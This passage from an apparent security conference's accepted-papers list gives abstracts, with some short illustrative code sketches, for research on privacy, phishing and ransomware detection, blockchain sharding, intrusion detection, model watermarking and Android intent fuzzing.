Abstract: The research on tasks involving differentially private data stream releases has traditionally centered around real-time scenarios. However, not all data streams inherently demand real-time releases, and achieving such releases is challenging due to network latency and processing constraints in practical settings. We delve into the advantages of introducing a delay time in stream releases. Concentrating on the event-level privacy setting, we discover that incorporating a delay can overcome limitations faced by current approaches, thereby unlocking substantial potential for improving accuracy.

Building on these insights, we developed a framework for data stream releases that allows for delays. Capitalizing on data similarity and relative order characteristics, we devised two optimization strategies, group-based and order-based optimizations, to aid in reducing the added noise and post-processing of noisy data. Additionally, we introduce a novel sensitivity truncation mechanism, further reducing the amount of introduced noise. Our comprehensive experimental results demonstrate that, on a data stream of length 18,319, allowing a delay of 10 timestamps enables the proposed approaches to achieve up to a 30× improvement in accuracy compared to baseline methods. Our code is open-sourced.
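For intuition on why a delay budget helps (a simplified toy, not the paper's mechanisms): buffering d values and releasing one noisy group average reduces the per-event sensitivity from 1 to 1/d, so far less Laplace noise is needed, and the averaging error stays small whenever nearby values are similar, the kind of data similarity the group-based optimization exploits. All parameters below are illustrative.

```python
import numpy as np

rng = np.random.default_rng(0)

def realtime_release(stream, eps, sensitivity=1.0):
    """Event-level DP baseline: add Laplace noise to every value immediately."""
    return [x + rng.laplace(scale=sensitivity / eps) for x in stream]

def delayed_release(stream, eps, delay=10, sensitivity=1.0):
    """Buffer `delay` values, then release one noisy average per buffer.

    One event changes a single value by at most `sensitivity`, so the group
    average has sensitivity `sensitivity / delay` and needs much less noise.
    """
    out = []
    for i in range(0, len(stream), delay):
        block = stream[i:i + delay]
        noisy_avg = float(np.mean(block)) + rng.laplace(scale=sensitivity / (len(block) * eps))
        out.extend([noisy_avg] * len(block))  # answer each timestamp with the group estimate
    return out

# A slowly varying stream: values within a 10-step window are similar, so the
# group average is a good stand-in for the individual values.
t = np.arange(1000)
stream = 25 + 20 * np.sin(t / 200) + rng.normal(0, 0.2, size=t.size)

rt = np.array(realtime_release(stream, eps=1.0))
dl = np.array(delayed_release(stream, eps=1.0, delay=10))
print("real-time MAE:", np.abs(rt - stream).mean())  # ~1.0 (Laplace scale 1)
print("delayed   MAE:", np.abs(dl - stream).mean())  # several times smaller
```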

Topic: Privacy and anonymity in networks and distributed systems


Diffence: Fencing Membership Privacy With Diffusion Models
Yuefeng Peng, Ali Naseh, Amir Houmansadr (UMass Amherst)

Abstract: Deep learning models, while achieving remarkable performances across various tasks, are vulnerable to membership inference attacks (MIAs), wherein adversaries identify if a specific data point was part of the model’s training set. This susceptibility raises substantial privacy concerns, especially when models are trained on sensitive datasets. Although various defenses have been proposed, there is still substantial room for improvement in the privacy-utility trade-off. In this work, we introduce a novel defense framework against MIAs by leveraging generative models. The key intuition of our defense is to remove the differences between member and non-member inputs, which are exploited by MIAs, by re-generating input samples before feeding them to the target model. Therefore, our defense, called Diffence, works pre-inference, unlike prior defenses that operate either at training time (modifying the model) or at post-inference time (modifying the model’s output).

A unique feature of Diffence is that it works on input samples only, without modifying the training or inference phase of the target model. Therefore, it can be cascaded with other defense mechanisms, as we demonstrate through experiments. Diffence is specifically designed to preserve the model’s prediction labels for each sample, thereby not affecting accuracy. Furthermore, we have empirically demonstrated that it does not reduce the usefulness of the confidence vectors. Through extensive experimentation, we show that Diffence can serve as a robust plug-n-play defense mechanism, enhancing membership privacy without compromising model utility—both in terms of accuracy and the usefulness of confidence vectors—across standard and defended settings. For instance, Diffence reduces MIA attack accuracy against an undefended model by 15.8% and attack AUC by 14.0% on average across three datasets, all without impacting model utility. By integrating Diffence with prior defenses, we can achieve new state-of-the-art performances in the privacy-utility trade-off. For example, when combined with the state-of-the-art SELENA defense, it reduces attack accuracy by 9.3% and attack AUC by 10.0%. Diffence achieves this by imposing a negligible computation overhead, adding an average of only 57 ms to the inference time per sample.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Dissecting Payload-based Transaction Phishing on Ethereum
Zhuo Chen, Yufeng Hu, Bowen He, Dong Luo, Lei Wu, Yajin Zhou (Zhejiang University)

Abstract: In recent years, a more advanced form of phishing has arisen on Ethereum, surpassing early-stage, simple transaction phishing. This new form, which we refer to as payload-based transaction phishing (PTXPHISH), manipulates smart contract interactions through the execution of malicious payloads to deceive users. PTXPHISH has rapidly emerged as a significant threat, leading to reported incidents that caused losses exceeding $70 million in 2023. Despite its substantial impact, no previous studies have systematically explored PTXPHISH.

In this paper, we present the first comprehensive study of PTXPHISH on Ethereum. Firstly, we conduct a long-term data collection and put considerable effort into establishing the first ground-truth PTXPHISH dataset, consisting of 5,000 phishing transactions. Based on the dataset, we dissect PTXPHISH, categorizing phishing tactics into four primary categories and eleven sub-categories. Secondly, we propose a rule-based multi-dimensional detection approach to identify PTXPHISH, achieving an F1-score of over 99% and processing each block in an average of 390 ms. Finally, we conduct a large-scale detection spanning 300 days and discover a total of 130,637 phishing transactions on Ethereum, resulting in losses exceeding $341.9 million. Our in-depth analysis of these phishing transactions yielded valuable and insightful findings. To propagate address poisoning scams, scammers consume approximately 13.4 ETH daily, which accounts for 12.5% of the total Ethereum gas. Additionally, our analysis reveals patterns in the cash-out process employed by phishing scammers, and we find that the top five phishing organizations are responsible for 40.7% of all losses.

Furthermore, our work has made significant contributions to mitigating real-world threats. We have reported 1,726 phishing addresses to the community, accounting for 42.7% of total community contributions during the same period. Additionally, we have sent 2,539 on-chain alert messages, assisting 1,980 victims. This research serves as a valuable reference in combating the emerging PTXPHISH and safeguarding users’ assets.

Topics: Cyber-crime defense and forensics (e.g., anti-phishing, anti-blackmailing, anti-fraud techniques); Security and privacy for blockchains and cryptocurrencies


Duumviri: Detecting Trackers and Mixed Trackers with a Breakage Detector
He Shuang (University of Toronto); Lianying Zhao (Carleton University); David Lie (University of Toronto)

Abstract: Web tracking harms user privacy. As a result, the use of tracker detection and blocking tools is a common practice among Internet users. However, no such tool can be perfect, and thus there is a trade-off between avoiding breakage (caused by unintentionally blocking some required functionality) and neglecting to block some trackers. State-of-the-art tools usually rely on user reports and developer effort to detect breakages, which can be broadly categorized into two causes: 1) misidentifying non-trackers as trackers, and 2) blocking mixed trackers which blend tracking with functional components.

We propose incorporating a machine learning-based breakage detector into the tracker detection pipeline to automatically avoid misidentification of functional resources. For both tracker detection and breakage detection, we propose using differential features that can more clearly elucidate the differences caused by blocking a request. We designed and implemented a prototype of our proposed approach, Duumviri, for non-mixed trackers. We then adapt it to automatically identify mixed trackers, drawing differential features at partial-request granularity.

In the case of non-mixed trackers, evaluating Duumviri on 15K pages shows its ability to replicate the labels of the human-generated filter list EasyPrivacy with an accuracy of 97.44%. Through a manual analysis, we find that Duumviri can identify previously unreported trackers and its breakage detector can identify overly strict EasyPrivacy rules that cause breakage. In the case of mixed trackers, Duumviri is the first automated mixed tracker detector, and achieves a lower-bound accuracy of 74.19%. Duumviri has enabled us to detect and confirm 22 previously unreported unique trackers and 26 unique mixed trackers.

Topic: Privacy and anonymity in networks and distributed systems


ERW-Radar: An Adaptive Detection System against Evasive Ransomware by Contextual Behavior Detection and Fine-grained Content Analysis
Lingbo Zhao, Yuhui Zhang, Zhilu Wang, Fengkai Yuan, Rui Hou (Institute of Information Engineering, Chinese Academy of Sciences)

Abstract: To evade existing antivirus software and detection systems, ransomware authors tend to obscure behavior differences with benign programs by imitating them or by weakening malicious behaviors during encryption. Existing defense solutions have limited effects on defending against evasive ransomware. Fortunately, through extensive observation, we find I/O behaviors of evasive ransomware exhibit a unique repetitiveness during encryption. This is rarely observed in benign programs. Besides, the χ² test and the probability distribution of byte streams can effectively distinguish encrypted files from benignly modified files. Inspired by these, we first propose ERW-Radar, a detection system, to detect evasive ransomware accurately and efficiently. We make three breakthroughs: 1) a contextual Correlation mechanism to detect malicious behaviors; 2) a fine-grained content Analysis mechanism to identify encrypted files; and 3) adaptive mechanisms to achieve a better trade-off between accuracy and efficiency. Experiments show that ERW-Radar detects evasive ransomware with an accuracy of 96.18% while maintaining an FPR of 5.36%. The average overhead of ERW-Radar is 5.09% in CPU utilization and 3.80% in memory utilization.
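The χ² intuition for separating encrypted content from benign modifications can be sketched directly: ciphertext has a near-uniform byte histogram, so its χ² statistic against the uniform distribution is small, while structured file content scores far higher. A minimal illustration (not the paper's full content analysis):

```python
import os
import numpy as np

def byte_chi2(data: bytes) -> float:
    """Chi-square statistic of the byte histogram against a uniform distribution."""
    counts = np.bincount(np.frombuffer(data, dtype=np.uint8), minlength=256)
    expected = len(data) / 256.0
    return float(((counts - expected) ** 2 / expected).sum())

encrypted_like = os.urandom(64 * 1024)                                   # stand-in for ciphertext
text_like = ("lorem ipsum dolor sit amet " * 3000).encode()[:64 * 1024]  # structured content

print("ciphertext-like chi2:", round(byte_chi2(encrypted_like)))  # ~255 (close to uniform)
print("plaintext-like  chi2:", round(byte_chi2(text_like)))       # orders of magnitude larger
```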

Topic: Anti-malware techniques: detection, analysis, and prevention


EvoCrawl: Exploring Web Application Code and State using Evolutionary Search
Xiangyu Guo, Akshay Kawlay, Eric Liu, David Lie (University of Toronto)

Abstract: As more critical services move onto the web, it has become increasingly important to detect and address vulnerabilities in web applications. These vulnerabilities only occur under specific conditions: when 1) the vulnerable code is executed and 2) the web application is in the required state. If the application is not in the required state, then even if the vulnerable code is executed, the vulnerability may not be triggered. Previous work naively explores the application state by filling every field and triggering every JavaScript event before submitting HTML forms. However, this simplistic approach can fail to satisfy constraints between the web page elements, as well as input format constraints. To address this, we present EvoCrawl, a web crawler that uses evolutionary search to efficiently find different sequences of web interactions. EvoCrawl finds sequences that can successfully submit inputs to web applications and thus explore more code and server-side states than previous approaches. To assess the benefits of EvoCrawl, we evaluate it against three state-of-the-art vulnerability scanners on ten web applications. We find that EvoCrawl achieves better code coverage due to its ability to execute code that can only be executed when the application is in a particular state. On average, EvoCrawl achieves a 59% increase in code coverage and successfully submits HTML forms 5× more frequently than the next best tool. By integrating IDOR and XSS vulnerability scanners, we used EvoCrawl to find eight zero-day IDOR and XSS vulnerabilities in WordPress, HotCRP, Kanboard, ImpressCMS, and GitLab.
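The evolutionary-search skeleton behind such a crawler can be sketched generically: keep a population of candidate interaction sequences, score each by the coverage it achieves, and breed the fittest via crossover and mutation. Everything below (action vocabulary, fitness function) is an illustrative stand-in, not EvoCrawl itself.

```python
import random

ACTIONS = ["click:#submit", "fill:#email", "fill:#name", "click:#add", "select:#country"]

def fitness(sequence):
    """Placeholder fitness: a real crawler would replay the sequence in a
    browser and measure code/state coverage; here, diverse sequences that end
    with a click (a likely form submission) score higher."""
    return len(set(sequence)) + (2 if sequence and sequence[-1].startswith("click") else 0)

def mutate(seq, rate=0.2):
    return [random.choice(ACTIONS) if random.random() < rate else a for a in seq]

def crossover(a, b):
    cut = random.randrange(1, min(len(a), len(b)))
    return a[:cut] + b[cut:]

def evolve(pop_size=20, seq_len=6, generations=30):
    population = [[random.choice(ACTIONS) for _ in range(seq_len)] for _ in range(pop_size)]
    for _ in range(generations):
        population.sort(key=fitness, reverse=True)
        parents = population[: pop_size // 2]                 # keep the fittest half
        children = [mutate(crossover(random.choice(parents), random.choice(parents)))
                    for _ in range(pop_size - len(parents))]  # refill with offspring
        population = parents + children
    return max(population, key=fitness)

print(evolve())
```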

Topic: Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy


Explanation as a Watermark: Towards Harmless and Multi-bit Model Ownership Verification via Watermarking Feature Attribution
Shuo Shao, Yiming Li, Hongwei Yao, Yiling He, Zhan Qin, Kui Ren (Zhejiang University)

Abstract: Ownership verification is currently the most critical and widely adopted post-hoc method to safeguard model copyright. In general, model owners exploit it to identify whether a given suspicious third-party model is stolen from them by examining whether it has particular properties “inherited” from their released models. Currently, backdoor-based model watermarks are the primary and cutting-edge methods to implant such properties in the released models. However, backdoor-based methods have two fatal drawbacks, including harmfulness and ambiguity. The former indicates that they introduce maliciously controllable misclassification behaviors (i.e., backdoor) to the watermarked released models. The latter denotes that malicious users can easily pass the verification by finding other misclassified samples, leading to ownership ambiguity.

In this paper, we argue that both limitations stem from the ‘zero-bit’ nature of existing watermarking schemes, where they exploit the status (i.e., misclassified) of predictions for verification. Motivated by this understanding, we design a new watermarking paradigm, i.e., Explanation as a Watermark (EaaW), that implants verification behaviors into the explanation of feature attribution instead of model predictions. Specifically, EaaW embeds a ‘multi-bit’ watermark into the feature attribution explanation of specific trigger samples without changing the original prediction. We correspondingly design the watermark embedding and extraction algorithms inspired by explainable artificial intelligence. In particular, our approach can be used for different tasks (e.g., image classification and text generation). Extensive experiments verify the effectiveness and harmlessness of our EaaW and its resistance to potential attacks.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Generating API Parameter Security Rules with LLM for API Misuse Detection
Jinghua Liu, Yi Yang, Kai Chen, Miaoqian Lin (Institute of Information Engineering, Chinese Academy of Sciences, Beijing, China; School of Cyber Security, University of Chinese Academy of Sciences, China)

Abstract: When utilizing library APIs, developers should follow the API security rules to mitigate the risk of API misuse. API Parameter Security Rule (APSR) is a common type of security rule that specifies how API parameters should be safely used and places constraints on their values. Failure to comply with the APSRs can lead to severe security issues, including null pointer dereference and memory corruption. Manually analyzing numerous APIs and their parameters to construct APSRs is labor-intensive and needs to be automated. Existing studies generate APSRs from documentation and code, but the missing information and limited analysis heuristics result in missing APSRs. Given the superior capability of Large Language Models (LLMs) in code analysis and text generation without predefined heuristics, we attempt to utilize them to address the challenges encountered in API misuse detection. However, directly utilizing LLMs leads to incorrect APSRs that may cause false bugs in detection, as well as overly general APSRs that cannot be turned into applicable detection code, leaving many security bugs undiscovered.

In this paper, we present a new framework, named GPTAid, for automatic APSR generation by analyzing API source code with an LLM and detecting API misuse caused by incorrect parameter use. To validate the correctness of the LLM-generated APSRs, we propose an execution feedback-checking approach based on the observation that security-critical API misuse is often caused by APSR violations, and most of them result in runtime errors. Specifically, GPTAid first uses an LLM to generate raw APSRs and the Right calling code, and then generates Violation code for each raw APSR by modifying the Right calling code using the LLM. Subsequently, GPTAid performs dynamic execution on each piece of Violation code and further filters out the incorrect APSRs based on runtime errors. To further generate concrete APSRs, GPTAid employs a code differential analysis to refine the filtered ones. Particularly, as the programming language is more precise than natural language, GPTAid identifies the key operations within Violation code by differential analysis, and then generates the corresponding concrete APSR based on the aforementioned operations. These concrete APSRs can be precisely interpreted into applicable detection code, which proves effective in API misuse detection. Evaluated on a dataset containing 200 randomly selected APIs from eight popular libraries, GPTAid achieves a precision of 92.3%. Moreover, it generates 6 times more APSRs than state-of-the-art detectors on a comparison dataset of previously reported bugs and APSRs. We further evaluated GPTAid on 47 applications; it found 210 previously unknown security bugs that could potentially result in severe security issues (e.g., system crashes), 150 of which have been confirmed by developers after our reports.

Topics: Security and privacy of systems based on machine learning, federated learning, AI, and large language models; Software/firmware/hardware security analysis, customization, and extensions


Heimdall: Towards Risk-Aware Network Management Outsourcing
Yuejie Wang (Peking University); Qiutong Men (New York University); Yongting Chen, Jiajin Liu (New York University Shanghai); Gengyu Chen (Carnegie Mellon University); Ying Zhang (Meta); Guyue Liu (Peking University); Vyas Sekar (Carnegie Mellon University)

Abstract: Enterprises are increasingly outsourcing network management (e.g., troubleshooting routing issues) to reduce cost and improve efficiency, either by hiring third-party contractors or by outsourcing to third-party vendors. Unfortunately, recent events have shown that this outsourcing model has become a new source of network incidents in customer networks. In this work, we argue that a risk-aware outsourcing approach is needed that enables customers to measure and assess risk transparently and make informed decisions to minimize harm. We first concretely define the notion of risk in the context of outsourced network management and then present an end-to-end framework, called Heimdall, which enables enterprises to assess, monitor, and respond to risk. Heimdall automatically builds a dependency graph to accurately assess the risk of an outsourced task, and uses a fine-grained reference monitor to monitor and mitigate potential risks during operation. Our expert validation results show that Heimdall effectively controls risk for outsourced network operations, resolving 92% of practical issues at the minimal risk level while incurring only a marginal timing overhead of approximately 7%.

Topics: Integrating security in network protocols (e.g., routing, naming, and management); Network security policy implementation, deployment, and management


Horcrux: Synthesize, Split, Shift and Stay Alive; Preventing Channel Depletion via Universal and Enhanced Multi-hop Payments
Anqi Tian (Institute of Software, Chinese Academy of Sciences and School of Computer Science and Technology, University of Chinese Academy of Sciences); Peifang Ni (Institute of Software, Chinese Academy of Sciences and Zhongguancun Laboratory, Beijing, P.R.China); Yingzi Gao (Institute of Software, Chinese Academy of Sciences and School of Computer Science and Technology, University of Chinese Academy of Sciences); Jing Xu (Institute of Software, Chinese Academy of Sciences and Zhongguancun Laboratory, Beijing, P.R.China)

Abstract: Payment Channel Networks (PCNs) have been highlighted as viable solutions to address the scalability issues in current permissionless blockchains. They facilitate off-chain transactions, significantly reducing the load on the blockchain. However, the extensive reuse of multi-hop routes in the same direction poses a risk of channel depletion, resulting in involved channels becoming unidirectional or even closing, thereby compromising the sustainability and scalability of PCNs. Even more concerning, existing rebalancing protocol solutions heavily rely on trust assumptions and scripting languages, resulting in compromised universality and reliability.

In this paper, we present Horcrux, a universal and efficient multi-party virtual channel protocol without relying on extra trust assumptions, scripting languages, or the perpetual online requirement. Horcrux fundamentally addresses the channel depletion problem using a novel approach termed \textit{flow neutrality}, which minimizes the impact on channel balance allocations during multi-hop payments (MHPs). Additionally, we formalize the security properties of Horcrux by modeling it within the Global Universal Composability framework and provide a formal security proof.

We implement Horcrux on a real Lightning Network dataset, comprising 10,529 nodes and 38,910 channels, and compare it to the state-of-the-art rebalancing schemes such as Shaduf [NDSS’22], Thora [CCS’22], and Revive [CCS’17]. The experimental results demonstrate that (1) the entire process of Horcrux costs less than 1 USD, significantly lower than Shaduf; (2) Horcrux achieves a 12%-30% increase in payment success ratio and reduces user deposits required for channels by 70%-91%; (3) the performance of Horcrux improves by 1.2x-1.5x under long-term operation; and (4) Horcrux maintains a nearly zero channel depletion rate, whereas both Revive and Shaduf result in thousands of depleted channels.

Topic: Security and privacy for blockchains and cryptocurrencies


Incorporating Gradients to Rules: Towards Lightweight, Adaptive Provenance-based Intrusion Detection
Lingzhi Wang, Xiangmin Shen, Weijian Li (Northwestern University); Zhenyuan LI (Zhejiang University); R. Sekar (Stony Brook University); Han Liu, Yan Chen (Northwestern University)

Abstract: As cyber attacks grow increasingly sophisticated and stealthy, it becomes more imperative and challenging to distinguish intrusions from normal behaviors. Through fine-grained causality analysis, provenance-based intrusion detection systems (PIDS) have demonstrated a promising capacity to distinguish benign and malicious behaviors, attracting widespread attention from both industry and academia. Among diverse approaches, rule-based PIDS stands out due to its lightweight overhead, real-time capabilities, and explainability. However, existing rule-based systems suffer from low detection accuracy, especially high false alarm rates, due to the lack of fine-grained rules and environment-specific configurations.

In this paper, we propose CAPTAIN, a rule-based PIDS capable of automatically adapting to diverse environments. Specifically, we propose three adaptive parameters to adjust the detection configuration with respect to nodes, edges, and alarm generation thresholds. We build a differentiable tag propagation framework and utilize the gradient descent algorithm to optimize these adaptive parameters based on the training data. We evaluate our system using data from DARPA Engagements and simulated environments. The evaluation results demonstrate that CAPTAIN enhances rule-based PIDS with learning capabilities, resulting in improved detection accuracy, reduced detection latency, lower runtime overhead, and more interpretable detection procedures and results compared to the state-of-the-art (SOTA) PIDS.
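
CAPTAIN’s differentiable tag-propagation framework is not reproduced here, but the minimal numpy sketch below illustrates the general idea of making an alarm threshold differentiable (via a sigmoid relaxation) and fitting it by gradient descent on labeled scores. All data, parameter names, and constants are invented for illustration.

```python
import numpy as np

# Minimal sketch of gradient-based tuning of a detection threshold.
# This is a generic illustration, not CAPTAIN's tag-propagation model.
rng = np.random.default_rng(0)
benign_scores = rng.normal(0.3, 0.1, 500)      # synthetic anomaly scores
malicious_scores = rng.normal(0.7, 0.1, 50)
scores = np.concatenate([benign_scores, malicious_scores])
labels = np.concatenate([np.zeros(500), np.ones(50)])

theta = 0.0      # adaptive threshold parameter being learned
lr = 0.1         # learning rate
k = 20.0         # steepness of the sigmoid relaxation

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

for step in range(200):
    # Smooth (differentiable) surrogate for "score exceeds threshold".
    p_alarm = sigmoid(k * (scores - theta))
    # Cross-entropy between soft alarms and ground-truth labels.
    loss = -np.mean(labels * np.log(p_alarm + 1e-9)
                    + (1 - labels) * np.log(1 - p_alarm + 1e-9))
    # dL/dtheta via the chain rule on the sigmoid relaxation.
    grad = np.mean((p_alarm - labels) * (-k))
    theta -= lr * grad

print(f"learned threshold: {theta:.3f}, final loss: {loss:.4f}")
```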

Topics: Cyber attack (e.g., APTs, botnets, DDoS) prevention, detection, investigation, and response; Security and privacy of systems based on machine learning, federated learning, AI, and large language models and Special problems and case studies: e.g., tradeoffs between security and efficiency, usability, cost, and ethics


Kronos: A Secure and Generic Sharding Blockchain Consensus with Optimized Overhead
Yizhong Liu, Andi Liu (Beihang University); Yuan Lu (Institute of Software, Chinese Academy of Sciences); Zhuocheng Pan (Beihang University); Yinuo Li (Xi’an Jiaotong University); Jianwei Liu, Song Bian (Beihang University); Mauro Conti (University of Padua)

Abstract: Sharding enhances blockchain scalability by dividing the network into shards, each managing specific unspent transaction outputs or accounts. As a newly introduced transaction type, cross-shard transactions pose a critical challenge to the security and efficiency of sharding blockchains. Currently, there is no generic sharding blockchain consensus pattern that achieves both security and low overhead.

In this paper, we present Kronos, a secure sharding blockchain consensus achieving optimized overhead. In particular, we propose a new secure sharding blockchain consensus pattern based on a buffer managed jointly by shard members. Valid transactions are transferred to the payee via the buffer, while invalid ones are rejected through happy or unhappy paths. Kronos is proved to achieve security with atomicity under malicious clients while maintaining optimal intra-shard overhead. Rejection is efficient: happy paths require no Byzantine fault tolerance (BFT) protocol execution, and the cost of unhappy paths is no higher than a two-phase commit. Besides, we propose secure cross-shard certification methods. Handling b transactions, Kronos is proved to achieve cross-shard communication with low cross-shard overhead O(nbλ) (where n is the shard size and λ the security parameter). Notably, Kronos imposes no restrictions on BFT and does not rely on timing assumptions, offering optional constructions in various modules. Kronos could serve as a universal framework for enhancing the performance and scalability of existing BFT protocols. Kronos supports generic models, including asynchronous networks, and can increase throughput by several orders of magnitude.

We implement Kronos using two prominent BFT protocols: asynchronous Speeding Dumbo (NDSS’22) and partially synchronous HotStuff (PODC’19). Extensive experiments (on up to 1000 AWS EC2 nodes across 4 AWS regions) demonstrate that Kronos scales consensus to thousands of nodes, achieving a substantial throughput of 320 ktx/sec with 2.0 sec latency. Compared with past solutions, Kronos achieves up to a 12× improvement in throughput and a 50% reduction in latency when cross-shard transactions dominate the workload.

Topic: Security and privacy for blockchains and cryptocurrencies


LeakLess: Selective Data Protection against Memory Leakage Attacks for Serverless Platforms
Maryam Rostamipoor (Stony Brook University); Seyedhamed Ghavamnia (University of Connecticut); Michalis Polychronakis (Stony Brook University)

Abstract: As the use of language-level sandboxing for running untrusted code grows, the risks associated with memory disclosure vulnerabilities and transient execution attacks become increasingly significant. Besides the execution of untrusted JavaScript or WebAssembly code in web browsers, serverless environments have also started relying on language-level isolation to improve scalability by running multiple functions from different customers within a single process. Web browsers have adopted process-level sandboxing to mitigate memory leakage attacks, but this solution is not applicable in serverless environments, as running each function as a separate process would negate the performance benefits of language-level isolation.

In this paper we present LeakLess, a selective data protection approach for serverless computing platforms. LeakLess alleviates the limitations of previous selective data protection techniques by combining in-memory encryption with a separate I/O module to enable the safe transmission of the protected data between serverless functions and external hosts. We implemented LeakLess on top of the Spin serverless platform, and evaluated it with real-world serverless applications. Our results demonstrate that LeakLess offers robust protection while incurring a minor throughput decrease under stress-testing conditions of up to 2.8% when the I/O module runs on a different host than the Spin runtime, and up to 8.5% when it runs on the same host.

Topic: Security for cloud/edge computing


Magmaw: Modality-Agnostic Adversarial Attacks on Machine Learning-Based Wireless Communication Systems
Jung-Woo Chang, Ke Sun, Nasimeh Heydaribeni (University of California, San Diego); Seira Hidano (KDDI Research, Inc.); Xinyu Zhang, Farinaz Koushanfar (University of California, San Diego)

Abstract: Machine Learning (ML) has been instrumental in enabling joint transceiver optimization by merging all physical-layer blocks of end-to-end wireless communication systems. Although there have been a number of adversarial attacks on ML-based wireless systems, the existing methods do not provide a comprehensive view that accounts for the multi-modality of the source data, common physical-layer protocols, and wireless-domain constraints. This paper proposes Magmaw, a novel wireless attack methodology capable of generating universal adversarial perturbations for any multimodal signal transmitted over a wireless channel. We further introduce new objectives for adversarial attacks on downstream applications. We adopt widely used defenses to verify the resilience of Magmaw. For a proof-of-concept evaluation, we build a real-time wireless attack platform using a software-defined radio system. Experimental results demonstrate that Magmaw causes significant performance degradation even in the presence of strong defense mechanisms. Furthermore, we validate the performance of Magmaw in two case studies: an encrypted communication channel and a channel modality-based ML model. Our code is available at https://github.com/juc023/Magmaw.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


MALintent: Coverage Guided Intent Fuzzing Framework for Android
Ammar Askar, Fabian Fleischer (Georgia Institute of Technology); Christopher Kruegel, Giovanni Vigna (University of California, Santa Barbara); Taesoo Kim (Georgia Institute of Technology)

Abstract: Intents are the primary message-passing mechanism on Android, used for communication both within and between apps. Intents cross the trust boundary of applications and can break the security isolation between them. Because they share an API with intra-app communication, apps may unintentionally expose functionality, leading to serious security bugs. MALintent is an open-source fuzzing framework that uses novel coverage instrumentation techniques and customizable bug oracles to find security issues in Android Intent handlers. MALintent is the first Intent fuzzer that applies greybox fuzzing to compiled, closed-source Android applications. We demonstrate techniques widely compatible with many versions of Android, and our bug oracles were able to find several crashes, vulnerabilities with privacy implications, and memory-safety issues in the top-downloaded Android applications on the Google Play store.
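
As a rough flavor of Intent fuzzing in general (not MALintent’s greybox instrumentation or bug oracles), the sketch below fires randomized Intents at an exported activity via adb and watches logcat for crashes. The package and component names are placeholders.

```python
import random
import string
import subprocess

# Naive black-box Intent fuzzing sketch (illustrative only; MALintent adds
# coverage instrumentation and richer oracles on closed-source apps).
TARGET = "com.example.app/.ExportedActivity"   # placeholder component

def random_string(n=16):
    return "".join(random.choices(string.ascii_letters + string.digits, k=n))

def send_intent():
    cmd = [
        "adb", "shell", "am", "start", "-n", TARGET,
        "--es", random_string(8), random_string(32),                        # string extra
        "--ei", random_string(8), str(random.randint(-2**31, 2**31 - 1)),   # int extra
        "--ez", random_string(8), random.choice(["true", "false"]),         # bool extra
    ]
    subprocess.run(cmd, capture_output=True, text=True, timeout=10)

def crashed():
    log = subprocess.run(["adb", "logcat", "-d", "-s", "AndroidRuntime:E"],
                         capture_output=True, text=True, timeout=10).stdout
    return "FATAL EXCEPTION" in log

for i in range(100):
    subprocess.run(["adb", "logcat", "-c"], capture_output=True)   # clear log
    send_intent()
    if crashed():
        print(f"iteration {i}: crash observed, save the Intent for triage")
```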

Topic: Security and privacy of mobile/smartphone platforms and their operating systems


Manifoldchain: Maximizing Blockchain Throughput via Bandwidth-Clustered Sharding
Chunjiang Che (The Hong Kong University of Science and Technology (Guangzhou)); Songze Li (Southeast University); Xuechao Wang (The Hong Kong University of Science and Technology (Guangzhou))

Abstract: Bandwidth limitation is the major bottleneck that hinders scaling throughput of proof-of-work blockchains. To guarantee security, the mining rate of the blockchain is determined by the miners with the lowest bandwidth, resulting in an inefficient bandwidth utilization among fast miners. We propose Manifoldchain, an innovative blockchain sharding protocol that alleviates the impact of slow miners to maximize blockchain throughput. Manifoldchain utilizes a bandwidth-clustered shard formation mechanism that groups miners with similar bandwidths into the same shard. Consequently, this approach enables us to set an optimal mining rate for each shard based on its bandwidth, effectively reducing the waiting time caused by slow miners. Nevertheless, the adversary could corrupt miners with similar bandwidths, thereby concentrating hashing power and potentially creating an adversarial majority within a single shard. To counter this adversarial strategy, we introduce sharing mining, allowing the honest mining power of the entire network to participate in the secure ledger formation of each shard, thereby achieving the same level of security as an unsharded blockchain. Additionally, we introduce an asynchronous atomic commitment mechanism to ensure transaction atomicity across shards with various mining rates. Our theoretical analysis demonstrates that Manifoldchain scales linearly in throughput with the increase in shard numbers and inversely with network delay in each shard. We implement a full system prototype of Manifoldchain, comprehensively evaluated on both simulated and real-world testbeds. These experiments validate its vertical scalability with network bandwidth and horizontal scalability with network size, achieving a substantial improvement of 186% in throughput over baseline sharding protocols, for scenarios where bandwidths of miners range from 5 Mbps to 60 Mbps.
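
The bandwidth-clustered shard formation can be pictured with the toy grouping below. The bandwidths are synthetic, the rate rule is a placeholder, and the code is only an illustration of the clustering idea, not the paper’s exact mechanism: each shard’s mining rate is bounded by its own slowest member instead of the slowest miner in the whole network.

```python
import random

# Toy sketch of bandwidth-clustered shard formation (illustrative only).
random.seed(1)
miners = [{"id": i, "bw_mbps": random.uniform(5, 60)} for i in range(32)]

NUM_SHARDS = 4
miners.sort(key=lambda m: m["bw_mbps"])          # group similar bandwidths
size = len(miners) // NUM_SHARDS
shards = [miners[i * size:(i + 1) * size] for i in range(NUM_SHARDS)]

def mining_rate(bw_mbps):
    # Placeholder rule: rate proportional to bandwidth (arbitrary units).
    return 0.1 * bw_mbps

for idx, shard in enumerate(shards):
    slowest = min(m["bw_mbps"] for m in shard)
    print(f"shard {idx}: {len(shard)} miners, slowest {slowest:.1f} Mbps, "
          f"rate {mining_rate(slowest):.2f} blocks/unit")

# Unsharded baseline: the whole network is throttled by the single slowest miner.
global_slowest = min(m["bw_mbps"] for m in miners)
print(f"unsharded rate: {mining_rate(global_slowest):.2f} blocks/unit")
```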

Topic: Security and privacy for blockchains and cryptocurrencies


Mens Sana In Corpore Sano: Sound Firmware Corpora for Vulnerability Research
René Helmke (Fraunhofer FKIE); Elmar Padilla (Fraunhofer FKIE, Germany); Nils Aschenbruck (University of Osnabrück)

Abstract: Firmware corpora for vulnerability research should be scientifically sound. Yet, several practical challenges complicate the creation of sound corpora: Sample acquisition, for example, is hard, and one must overcome the barrier of proprietary or encrypted data. As image contents are unknown prior to analysis, it is hard to select high-quality samples that can satisfy scientific demands.

Ideally, we help each other out by sharing data. But here, sharing is problematic due to copyright laws. Instead, papers must carefully document each step of corpus creation: If a step is unclear, replicability is jeopardized. This has cascading effects on result verifiability, representativeness, and, thus, soundness.

